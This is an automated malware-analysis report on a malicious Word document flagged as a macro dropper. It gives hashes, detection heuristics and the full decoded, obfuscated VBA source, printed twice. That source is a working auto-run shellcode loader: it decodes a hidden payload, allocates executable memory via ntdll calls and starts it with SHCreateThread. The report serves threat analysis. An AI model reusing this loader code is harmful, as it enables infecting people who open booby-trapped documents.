Office (OLE) malware analysis — malicious · c610c28e8e0c7d97

MALICIOUS

Office (OLE)

178.0 KB Created: 2016-11-22 15:18:00 Authoring application: Microsoft Office Word First seen: 2016-12-03

MD5: fbacd3a810f755d1cf6067a215e56ba6 SHA-1: 0333bc58d3410550b422e4982683a2e6d435f593 SHA-256: c610c28e8e0c7d97062e93863fdcf6e9c2dd29ce495ae82615f0123c864a444f

170 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-1841838'. It contains VBA macros, including a Document_Open macro that utilizes GetObject, indicating an attempt to execute code. The obfuscated VBA script likely downloads and executes a secondary payload, a common tactic for droppers. No specific family could be confidently identified.

Heuristics 6

ClamAV: Doc.Dropper.Agent-1841838 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-1841838
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

    Set wdApp = GetObject(, "Word.Application")
    Set wdDoc = wdApp.ActiveDocument

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
Dim nonce As String
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13127 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13127 bytes
SHA-256: `5f9d7b4fee551dfb02dc5d5b808101942b4d7bba17b0c742d36e36a951fca2da`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub headerFooter() Dim myHeader As headerFooter Set myHeader = ActiveDocument.Sections(1).Headers _ (wdHeaderFooterPrimary) End Sub Function ratified(anesthetized) Dim accretive As String Dim fleck As Byte Dim biol As Long canister biol, VarPtr(anesthetized) + 8, 4 Dim speed As Long Dim neomys As Integer Dim behindhand As Long #If Win64 Then Dim endoparasite As Long Dim blueness As Byte Dim deleterious As LongPtr Dim extortion As Byte Dim oversensitive As LongPtr Dim auroroa As Integer #Else Dim domiciled As String Dim deleterious As Long Dim scaliness As Long Dim oversensitive As Long Dim kisses As Integer Dim neopolitan As Variant #End If clothesline = -1 deleterious = 109 - 4 - 105 defeatism = 0 oversensitive = 124 + 9613 jokingly = 4096 nimblewitted = 64 geographically = toft(ByVal clothesline, deleterious, ByVal defeatism, oversensitive, ByVal jokingly, ByVal nimblewitted) evil = "carangidae" erection = "pithless" canister ByVal deleterious, biol, 6183 gem = 55 imbreu = 83 If (gem / imbreu) >= 7 Then gem = Trim("agr") & Trim("anulocytosis") choirmaster = Abs(239.51) despairingly = despairingly consolidative = Replace("cquerulousness", "querulousness", "a") & Trim("refree") Else erection = "docked" imbreu = 11 End If ratified = deleterious End Function Sub pendente() Dim lithophyte As String Dim rari As Variant Set afterbirth = erosive.insignificantly.Tabs For Each convolvulaceae In afterbirth alienum = 59 courtierly = 51 If (alienum / courtierly) >= 11 Then alienum = Replace("aburled", "burled", "c") & "comm" & LCase$("odAtiOn") unthankfulness = Fix(135.678) unthankfulness = unthankfulness / 482 imposition = Replace("benshrine", "enshrine", "r") & LCase$("it") Else unthankfulness = Round(155.1296) courtierly = 114 End If If convolvulaceae.Enabled = True Then fullcolored = "florist" waive = LTrim("sc") & "raper" osteology = "eggs" magniloquence = convolvulaceae.Tag End If Next semivowel = 8244 seedless = Right(magniloquence, semivowel) efficient = installation.holmium(seedless) cambio = 86 earnestly = 73 If (cambio / earnestly) >= 6 Then cambio = Replace("aencumbered", "encumbered", "r") & RTrim("seni") & LCase$("ouS") fern = Round(351.387) choirmaster = fern * 1 albeit = RTrim("pe") & RTrim("ptone") Else evil = bountifulness earnestly = 69 End If bedclothes = "ac" & "cept" #If Win64 Then Dim cramped As String Dim anchored As hoyle Dim presupposition As LongPtr anchored.start = 0 Dim ophthalmology As Variant #Else Dim thigh As Byte anchored = 0 Dim deposit As Integer Dim presupposition As Long #End If miniaturization = 0 bankbook = "emerging" pigeonbreasted = 86 + 57 + 3953 autofluorescence = 10 While autofluorescence <= 15 autofluorescence = autofluorescence + 2 despairingly = "defamer" unthankfulness = unthankfulness + 481 Wend malpractice = "proclaim" nudge = RTrim("ut") & "terly" hydromyinae = "dynamiter" acuminate = "choppy" axis = 4 While axis <= 8 axis = axis + 2 erection = "mottled" choirmaster = Int(159.1337) Wend fiction = efficient pyrrhonism = "douanier" presupposition = ratified(fiction) transom = "anointed" #If VBA6 And Win64 Then Dim selfdeprecating As Integer clique = "ammobium" ceremonie = "sunbonnet" alarmist = "ded" & "icated" shitless = 114 - 8 + 1174 #ElseIf Win32 Then doubleacrostic = "suitor" knurly = "abasia" cleaver = "gat" varied = 104 - 128 + 120 + 410 shitless = varied + 3171 #End If Dim celsius As Long Dim mummy As Variant Dim hotelier As Long hotelier = 0 Dim oriel As Long oriel = presupposition + shitless Dim fucking As Long fucking = 95 - 94 barefaced = bonnet(oriel, hotelier, fucking, hotelier) monstrum = 12 While monstrum <= 16 monstrum = monstrum + 2 choirmaster = Int(290.1088) fern = Int(451.288) Wend End Sub Private Sub Document_Open() Dim nonce As String Dim driveway As Long microcyte = "expressed" pendente For mantology = 23 To 72 adrenotrophin = 72 erection = bountifulness sciolist = LCase$("aN") & Replace("almagog", "magog", "yze") sciolist = "al" & LTrim("l") Next mantology End Sub Attribute VB_Name = "installation" 'But think twice, that's my only advice #If VBA6 And Win64 Then 'Does that make me crazy? Public Type hoyle 'And I hope that you are having the time of your life start As LongPtr 'Maybe you're crazy End Type 'And it's no coincidence I've come Public Declare PtrSafe Function romanist Lib "user32" Alias "OpenClipboard" (endless As LongPtr) As Boolean 'But it wasn't because I didn't know enough Public Declare PtrSafe Function bonnet Lib "Shlwapi" Alias "SHCreateThread" (ByVal landwehr As Any, ByVal elizabeth As Any, ByVal brownie As Any, ByVal variegated As Any) As LongPtr 'Ever since I was little, ever since I was little it looked like fun Public Declare PtrSafe Function anastigmat Lib "user32" Alias "SetParent" (ByVal blackcock As LongPtr, ByVal lupanar As LongPtr,animastic As LongPtr) As LongPtr 'I think you're crazy Public Declare PtrSafe Function ovation Lib "user32" Alias "EndPaint" (fronder As LongPtr,fieriness As LongPtr) As LongPtr 'But it wasn't because I didn't know enough Public Declare PtrSafe Function archdeaconry Lib "user32" Alias "GetUpdateRect" (acaricide As LongPtr, alces As LongPtr,mineralized As LongPtr) As Boolean 'And I hope that you are having the time of your life Public Declare PtrSafe Function toft Lib "ntdll" Alias "ZwAllocateVirtualMemory" (highwayman As LongPtr, manes As LongPtr, ByVal diakinesis As LongPtr,bottomlessByVal As LongPtr, ornithorhynchus As LongPtr, ByVal pantyhose As LongPtr) As LongPtr 'Without care, Public Declare PtrSafe Sub canister Lib "ntdll.dll" Alias "RtlMoveMemory" (besiege As Any, ByVal sac As Any, ByVal misreading As LongPtr) 'And I can die when I'm done Public Declare PtrSafe Function academia Lib "kernel32.dll" Alias "Sleep" (demosthenic As LongPtr) 'Maybe I'm crazy 'Probably #Else 'Just like me Public Declare Sub canister Lib "ntdll.dll" Alias "RtlMoveMemory" (south As Any, ByVal enchant As Any, ByVal lutjanus As Long) 'But it wasn't because I didn't know enough Public Declare Function toft Lib "ntdll" Alias "ZwAllocateVirtualMemory" (temporality As Long, ashamed As Long, ByVal ac As Long, anthelminticByVal As Long, haliaeetus As Long, ByVal ladderback As Long) As Long 'Even your emotions had an echo Public Declare Function buildup Lib "user32" Alias "EndPaint" (animos As Long, bibliopole As Long) As Long 'And all I remember is thinking, I want to be like them Public Declare Function aspergillosis Lib "user32" Alias "SetParent" (ByVal comedown As Long, ByVal gymslip As Long, unsympathizing As Long) As Long 'Ever since I was little, ever since I was little it looked like fun Public Declare Function sisyridae Lib "user32" Alias "OpenClipboard" (calliopsis As Long) As Boolean 'Maybe we're crazy Public Declare Function approximative Lib "user32" Alias "GetUpdateRect" (manoftheearth As Long, ahab As Long, timekeeper As Long) As Boolean 'But it wasn't because I didn't know enough Public Declare Function shopworn Lib "kernel32.dll" Alias "Sleep" (misfire As Long) 'Even your emotions had an echo Public Declare Function bonnet Lib "Shlwapi" Alias "SHCreateThread" (ByVal causeway As Any, ByVal polarity As Any, ByVal lincomycin As Any, ByVal aphorism As Any) As Long 'Maybe I'm crazy 'Without care, #End If 'There was something so pleasant about that place. Sub InsertText() Dim wdApp As Word.Application Dim wdDoc As Document Dim wdSln As Selection Set wdApp = GetObject(, "Word.Application") Set wdDoc = wdApp.ActiveDocument Set wdSln = wdApp.Selection wdDoc.Application.Options.Overtype = False With wdSln If .Type = wdSelectionIP Then .TypeText ("Inserting at insertion point. ") ElseIf .Type = wdSelectionNormal Then If wdApp.Options.ReplaceSelection Then .Collapse Direction:=wdCollapseStart End If .TypeText ("Inserting before a text block. ") End If End With Set wdApp = Nothing Set wdDoc = Nothing End Sub Function holmium(mainspring) As String Dim branta As Long choirmaster = Abs(477.943) Dim adjuc(255) As Byte Dim cuquenan() As Byte Dim disseminate As Variant Dim monstrance As Long Dim journalism(63) As Long Dim perennium As Long fern = Abs(253.1377) Dim apophasis As Integer Dim flax As String Dim fogyish As Variant Dim collide As Integer Dim aphrodite(63) As Long Dim prospectively(6965) As Byte Dim conventioneer(63) As Long Dim forehand As Long Dim praxis As Variant snorer = 8 + 4088 Dim preparer As Byte enlarged = 16711680 stargazer = 61 + 41 + 79 + 65099 oracle = 7 + 65529 Dim impelled As Long hollandaise = 14 + 16515058 auc = 128 - 38 - 27 beaugregory = 5 + 107 + 144 numerate = 38 - 24 + 241 budapest = 49 - 26 + 258025 angelically = 21 + 43 methodize = 17 + 4015 baccivorous = 262144 Dim backflow As Integer Dim adamantine(8243) As Byte scombroidea = 14 + 113 - 127 gazelle = 8243 For caryota = scombroidea To gazelle benzoin = 10 - 65 + 56 architecturally = Mid$(mainspring, caryota + 1, benzoin) beaconfire = "jung" birdseye = "au" & Trim("rar") dragon = "antitypic" callionymidae = wheaten(architecturally) adamantine(caryota) = callionymidae Next Dim canvas As Integer For elbowroom = 4 To 61 meagerness = 61 bountifulness = "facts" arachis = RTrim("enth") & Trim("usiastic") arachis = "ag" & Replace("disauden", "auden", "tis") Next elbowroom dumbfounded = 8243 nakedwood = 45 + 104 + 102 - 216 For guidebook = 0 To dumbfounded adamantine(guidebook) = adamantine(guidebook) + 9 Next guidebook chowchow = 12 While chowchow <= 16 chowchow = chowchow + 2 bountifulness = "acinar" despairingly = bountifulness Wend collide = 0 argon = 122 stercorarius = 255 rimmed = 123 + 107 - 230 amorphophallus = 29 + 6 - 56 + 64 For branta = rimmed To stercorarius If (branta >= 65 And branta <= 90) Then adjuc(branta) = branta - 65 If (branta >= 97 And branta <= 122) Then adjuc(branta) = branta - 71 If (branta >= 48 And branta <= 57) Then adjuc(branta) = branta + 4 If branta = amorphophallus Then adjuc(branta) = 62 If branta = 47 Then adjuc(branta) = 63 Next branta For branta = 0 To 63 conventioneer(branta) = novelization(branta, angelically) aphrodite(branta) = novelization(branta, snorer) journalism(branta) = novelization(branta, baccivorous) Next branta dracontium = 75 prestidigitation = 59 If (dracontium / prestidigitation) >= 33 Then dracontium = RTrim("do") & LTrim("ur") bountifulness = "abettor" despairingly = "besetting" chevaux = LCase$("plAs") & "modiid" & LTrim("ae") Else erection = "relevancy" prestidigitation = 66 End If cuquenan = adamantine diplopterygium = 108 + 117 - 221 outsole = 76 redundant = 95 If (outsole / redundant) >= 34 Then outsole = LCase$("aLP") & LCase$("hAbEtArian") choirmaster = Abs(293.854) fern = Round(273.125) mourner = RTrim("gr") & Replace("acilpubescent", "pubescent", "a") & Trim("riidae") Else unthankfulness = choirmaster * 1 redundant = 36 End If quibbling = 10 + 97 - 111 + 7 bountifulness = "femme" erection = "dolabriform" phytohormone = quibbling + 1 jetpropelled = 2 For forehand = 0 To dumbfounded hexaglot = cuquenan(forehand) schrodinger = cuquenan(forehand + 2) monstrance = journalism(adjuc(hexaglot)) _ + aphrodite(adjuc(cuquenan(forehand + 1))) + conventioneer(adjuc(schrodinger)) + adjuc(cuquenan(forehand + quibbling)) branta = enchanting(monstrance, enlarged) prospectively(perennium) = balanoposthitis(branta, oracle) branta = enchanting(monstrance, stargazer) prospectively(perennium + 1) = balanoposthitis(branta, beaugregory) prospectively(perennium + jetpropelled) = enchanting(monstrance, numerate) perennium = perennium + jetpropelled + 1 forehand = forehand + 3 Next holmium = prospectively End Function Function wheaten(impact) wheaten = AscW(impact) End Function Function balanoposthitis(mummichog, fatigued) balanoposthitis = mummichog \ fatigued End Function Function novelization(milliampere, bethel) novelization = milliampere * bethel End Function Function enchanting(bacchantic, advisory) enchanting = bacchantic And advisory End Function Attribute VB_Name = "erosive" Attribute VB_Base = "0{C3924C9C-6CFE-4AE7-ABD7-28B16CD87459}{288479EA-5434-43B3-A778-3E82FBF33BAF}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 5f9d7b4fee551dfb02dc5d5b808101942b4d7bba17b0c742d36e36a951fca2da

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub headerFooter()
    Dim myHeader As headerFooter
    Set myHeader = ActiveDocument.Sections(1).Headers _
        (wdHeaderFooterPrimary)
End Sub


Function ratified(anesthetized)
Dim accretive As String
Dim fleck As Byte
Dim biol As Long
canister biol, VarPtr(anesthetized) + 8, 4
Dim speed As Long
Dim neomys As Integer
Dim behindhand As Long
#If Win64 Then
Dim endoparasite As Long
Dim blueness As Byte
Dim deleterious As LongPtr
Dim extortion As Byte
Dim oversensitive As LongPtr
Dim auroroa As Integer
#Else
Dim domiciled As String
Dim deleterious As Long
Dim scaliness As Long
Dim oversensitive As Long
Dim kisses As Integer
Dim neopolitan As Variant
#End If
clothesline = -1
deleterious = 109 - 4 - 105
defeatism = 0
oversensitive = 124 + 9613
jokingly = 4096
nimblewitted = 64
geographically = toft(ByVal clothesline, deleterious, ByVal defeatism, oversensitive, ByVal jokingly, ByVal nimblewitted)
evil = "carangidae"

erection = "pithless"

canister ByVal deleterious, biol, 6183
gem = 55
imbreu = 83
If (gem / imbreu) >= 7 Then
gem = Trim("agr") & Trim("anulocytosis")
choirmaster = Abs(239.51)
despairingly = despairingly
consolidative = Replace("cquerulousness", "querulousness", "a") & Trim("refree")
Else
erection = "docked"
imbreu = 11
End If

ratified = deleterious
End Function
Sub pendente()
Dim lithophyte As String
Dim rari As Variant
Set afterbirth = erosive.insignificantly.Tabs
For Each convolvulaceae In afterbirth
alienum = 59
courtierly = 51
If (alienum / courtierly) >= 11 Then
alienum = Replace("aburled", "burled", "c") & "comm" & LCase$("odAtiOn")
unthankfulness = Fix(135.678)
unthankfulness = unthankfulness / 482
imposition = Replace("benshrine", "enshrine", "r") & LCase$("it")
Else
unthankfulness = Round(155.1296)
courtierly = 114
End If

If convolvulaceae.Enabled = True Then
fullcolored = "florist"
waive = LTrim("sc") & "raper"
osteology = "eggs"
magniloquence = convolvulaceae.Tag
End If
Next
semivowel = 8244
seedless = Right(magniloquence, semivowel)
efficient = installation.holmium(seedless)
cambio = 86
earnestly = 73
If (cambio / earnestly) >= 6 Then
cambio = Replace("aencumbered", "encumbered", "r") & RTrim("seni") & LCase$("ouS")
fern = Round(351.387)
choirmaster = fern * 1
albeit = RTrim("pe") & RTrim("ptone")
Else
evil = bountifulness
earnestly = 69
End If

bedclothes = "ac" & "cept"
#If Win64 Then
Dim cramped As String
Dim anchored As hoyle
Dim presupposition As LongPtr
anchored.start = 0
Dim ophthalmology As Variant
#Else
Dim thigh As Byte
anchored = 0
Dim deposit As Integer
Dim presupposition As Long
#End If
miniaturization = 0
bankbook = "emerging"
pigeonbreasted = 86 + 57 + 3953
autofluorescence = 10
While autofluorescence <= 15
autofluorescence = autofluorescence + 2
despairingly = "defamer"
unthankfulness = unthankfulness + 481
Wend

malpractice = "proclaim"
nudge = RTrim("ut") & "terly"
hydromyinae = "dynamiter"
acuminate = "choppy"
axis = 4
While axis <= 8
axis = axis + 2
erection = "mottled"
choirmaster = Int(159.1337)
Wend

fiction = efficient
pyrrhonism = "douanier"
presupposition = ratified(fiction)
transom = "anointed"
#If VBA6 And Win64 Then
Dim selfdeprecating As Integer
clique = "ammobium"
ceremonie = "sunbonnet"
alarmist = "ded" & "icated"
shitless = 114 - 8 + 1174
#ElseIf Win32 Then
doubleacrostic = "suitor"
knurly = "abasia"
cleaver = "gat"
varied = 104 - 128 + 120 + 410
shitless = varied + 3171

#End If
Dim celsius As Long
Dim mummy As Variant
Dim hotelier As Long
hotelier = 0
Dim oriel As Long
oriel = presupposition + shitless
Dim fucking As Long
fucking = 95 - 94
barefaced = bonnet(oriel, hotelier, fucking, hotelier)
monstrum = 12
While monstrum <= 16
monstrum = monstrum + 2
choirmaster = Int(290.1088)
fern = Int(451.288)
Wend

End Sub

Private Sub Document_Open()
Dim nonce As String
Dim driveway As Long
microcyte = "expressed"
pendente
For mantology = 23 To 72
adrenotrophin = 72
erection = bountifulness
sciolist = LCase$("aN") & Replace("almagog", "magog", "yze")
sciolist = "al" & LTrim("l")
Next mantology
End Sub


Attribute VB_Name = "installation"
'But think twice, that's my only advice
#If VBA6 And Win64 Then
'Does that make me crazy?
Public Type hoyle
'And I hope that you are having the time of your life
start As LongPtr
'Maybe you're crazy
End Type
'And it's no coincidence I've come
Public Declare PtrSafe Function romanist Lib "user32" Alias "OpenClipboard" (endless As LongPtr) As Boolean
'But it wasn't because I didn't know enough
Public  Declare PtrSafe Function bonnet Lib "Shlwapi" Alias "SHCreateThread" (ByVal landwehr As Any, ByVal elizabeth As Any, ByVal brownie As Any, ByVal variegated As Any) As LongPtr
'Ever since I was little, ever since I was little it looked like fun
Public Declare PtrSafe Function anastigmat Lib "user32" Alias "SetParent" (ByVal blackcock As LongPtr, ByVal lupanar As LongPtr,animastic As LongPtr) As LongPtr
'I think you're crazy
Public Declare PtrSafe Function ovation Lib "user32" Alias "EndPaint" (fronder As LongPtr,fieriness As LongPtr) As LongPtr
'But it wasn't because I didn't know enough
Public Declare PtrSafe Function archdeaconry Lib "user32" Alias "GetUpdateRect" (acaricide As LongPtr, alces As LongPtr,mineralized As LongPtr) As Boolean
'And I hope that you are having the time of your life
Public  Declare PtrSafe Function toft Lib "ntdll" Alias "ZwAllocateVirtualMemory" (highwayman As LongPtr, manes As LongPtr, ByVal diakinesis As LongPtr,bottomlessByVal As LongPtr, ornithorhynchus As LongPtr, ByVal pantyhose As LongPtr) As LongPtr
'Without care,
Public  Declare PtrSafe Sub canister Lib "ntdll.dll" Alias "RtlMoveMemory" (besiege As Any, ByVal sac As Any, ByVal misreading As LongPtr)
'And I can die when I'm done
Public Declare PtrSafe Function academia Lib "kernel32.dll" Alias "Sleep" (demosthenic As LongPtr)
'Maybe I'm crazy

'Probably
#Else
'Just like me
Public Declare Sub canister Lib "ntdll.dll" Alias "RtlMoveMemory" (south As Any, ByVal enchant As Any, ByVal lutjanus As Long)
'But it wasn't because I didn't know enough
Public Declare Function toft Lib "ntdll" Alias "ZwAllocateVirtualMemory" (temporality As Long, ashamed As Long, ByVal ac As Long, anthelminticByVal As Long, haliaeetus As Long, ByVal ladderback As Long) As Long
'Even your emotions had an echo
Public Declare Function buildup Lib "user32" Alias "EndPaint" (animos As Long, bibliopole As Long) As Long
'And all I remember is thinking, I want to be like them
Public Declare Function aspergillosis Lib "user32" Alias "SetParent" (ByVal comedown As Long, ByVal gymslip As Long, unsympathizing As Long) As Long
'Ever since I was little, ever since I was little it looked like fun
Public Declare Function sisyridae Lib "user32" Alias "OpenClipboard" (calliopsis As Long) As Boolean
'Maybe we're crazy
Public Declare Function approximative Lib "user32" Alias "GetUpdateRect" (manoftheearth As Long, ahab As Long, timekeeper As Long) As Boolean
'But it wasn't because I didn't know enough
Public Declare Function shopworn Lib "kernel32.dll" Alias "Sleep" (misfire As Long)
'Even your emotions had an echo
Public Declare Function bonnet Lib "Shlwapi" Alias "SHCreateThread" (ByVal causeway As Any, ByVal polarity As Any, ByVal lincomycin As Any, ByVal aphorism As Any) As Long
'Maybe I'm crazy

'Without care,
#End If
'There was something so pleasant about that place.
Sub InsertText()
    Dim wdApp As Word.Application
    Dim wdDoc As Document
    Dim wdSln As Selection
    
    Set wdApp = GetObject(, "Word.Application")
    Set wdDoc = wdApp.ActiveDocument
    Set wdSln = wdApp.Selection
    
    wdDoc.Application.Options.Overtype = False
    With wdSln
        If .Type = wdSelectionIP Then
            .TypeText ("Inserting at insertion point. ")
        ElseIf .Type = wdSelectionNormal Then
                If wdApp.Options.ReplaceSelection Then
                    .Collapse Direction:=wdCollapseStart
                End If
               .TypeText ("Inserting before a text block. ")
        End If
    End With
    Set wdApp = Nothing
    Set wdDoc = Nothing
End Sub

Function holmium(mainspring) As String
Dim branta As Long
choirmaster = Abs(477.943)

Dim adjuc(255) As Byte
Dim cuquenan() As Byte
Dim disseminate As Variant

Dim monstrance As Long
Dim journalism(63) As Long
Dim perennium As Long
fern = Abs(253.1377)

Dim apophasis As Integer

Dim flax As String
Dim fogyish As Variant

Dim collide As Integer
Dim aphrodite(63) As Long
Dim prospectively(6965) As Byte
Dim conventioneer(63) As Long
Dim forehand As Long
Dim praxis As Variant

snorer = 8 + 4088
Dim preparer As Byte

enlarged = 16711680
stargazer = 61 + 41 + 79 + 65099
oracle = 7 + 65529
Dim impelled As Long

hollandaise = 14 + 16515058
auc = 128 - 38 - 27
beaugregory = 5 + 107 + 144
numerate = 38 - 24 + 241
budapest = 49 - 26 + 258025
angelically = 21 + 43
methodize = 17 + 4015
baccivorous = 262144
Dim backflow As Integer
Dim adamantine(8243) As Byte
scombroidea = 14 + 113 - 127
gazelle = 8243
For caryota = scombroidea To gazelle
benzoin = 10 - 65 + 56
architecturally = Mid$(mainspring, caryota + 1, benzoin)
beaconfire = "jung"
birdseye = "au" & Trim("rar")
dragon = "antitypic"
callionymidae = wheaten(architecturally)
adamantine(caryota) = callionymidae
Next
Dim canvas As Integer
For elbowroom = 4 To 61
meagerness = 61
bountifulness = "facts"
arachis = RTrim("enth") & Trim("usiastic")
arachis = "ag" & Replace("disauden", "auden", "tis")
Next elbowroom

dumbfounded = 8243
nakedwood = 45 + 104 + 102 - 216
For guidebook = 0 To dumbfounded
adamantine(guidebook) = adamantine(guidebook) + 9
Next guidebook
chowchow = 12
While chowchow <= 16
chowchow = chowchow + 2
bountifulness = "acinar"
despairingly = bountifulness
Wend

collide = 0
argon = 122
stercorarius = 255
rimmed = 123 + 107 - 230
amorphophallus = 29 + 6 - 56 + 64
For branta = rimmed To stercorarius
If (branta >= 65 And branta <= 90) Then adjuc(branta) = branta - 65
If (branta >= 97 And branta <= 122) Then adjuc(branta) = branta - 71
If (branta >= 48 And branta <= 57) Then adjuc(branta) = branta + 4
If branta = amorphophallus Then adjuc(branta) = 62
If branta = 47 Then adjuc(branta) = 63
Next branta
For branta = 0 To 63
conventioneer(branta) = novelization(branta, angelically)
aphrodite(branta) = novelization(branta, snorer)
journalism(branta) = novelization(branta, baccivorous)
Next branta
dracontium = 75
prestidigitation = 59
If (dracontium / prestidigitation) >= 33 Then
dracontium = RTrim("do") & LTrim("ur")
bountifulness = "abettor"
despairingly = "besetting"
chevaux = LCase$("plAs") & "modiid" & LTrim("ae")
Else
erection = "relevancy"
prestidigitation = 66
End If

cuquenan = adamantine
diplopterygium = 108 + 117 - 221
outsole = 76
redundant = 95
If (outsole / redundant) >= 34 Then
outsole = LCase$("aLP") & LCase$("hAbEtArian")
choirmaster = Abs(293.854)
fern = Round(273.125)
mourner = RTrim("gr") & Replace("acilpubescent", "pubescent", "a") & Trim("riidae")
Else
unthankfulness = choirmaster * 1
redundant = 36
End If

quibbling = 10 + 97 - 111 + 7
bountifulness = "femme"

erection = "dolabriform"

phytohormone = quibbling + 1
jetpropelled = 2
For forehand = 0 To dumbfounded
hexaglot = cuquenan(forehand)
schrodinger = cuquenan(forehand + 2)
monstrance = journalism(adjuc(hexaglot)) _
 + aphrodite(adjuc(cuquenan(forehand + 1))) + conventioneer(adjuc(schrodinger)) + adjuc(cuquenan(forehand + quibbling))
branta = enchanting(monstrance, enlarged)
prospectively(perennium) = balanoposthitis(branta, oracle)
branta = enchanting(monstrance, stargazer)
prospectively(perennium + 1) = balanoposthitis(branta, beaugregory)
prospectively(perennium + jetpropelled) = enchanting(monstrance, numerate)
perennium = perennium + jetpropelled + 1
forehand = forehand + 3
Next
holmium = prospectively
End Function

Function wheaten(impact)
wheaten = AscW(impact)
End Function
Function balanoposthitis(mummichog, fatigued)
balanoposthitis = mummichog \ fatigued
End Function
Function novelization(milliampere, bethel)
novelization = milliampere * bethel
End Function
Function enchanting(bacchantic, advisory)
enchanting = bacchantic And advisory
End Function


Attribute VB_Name = "erosive"
Attribute VB_Base = "0{C3924C9C-6CFE-4AE7-ABD7-28B16CD87459}{288479EA-5434-43B3-A778-3E82FBF33BAF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.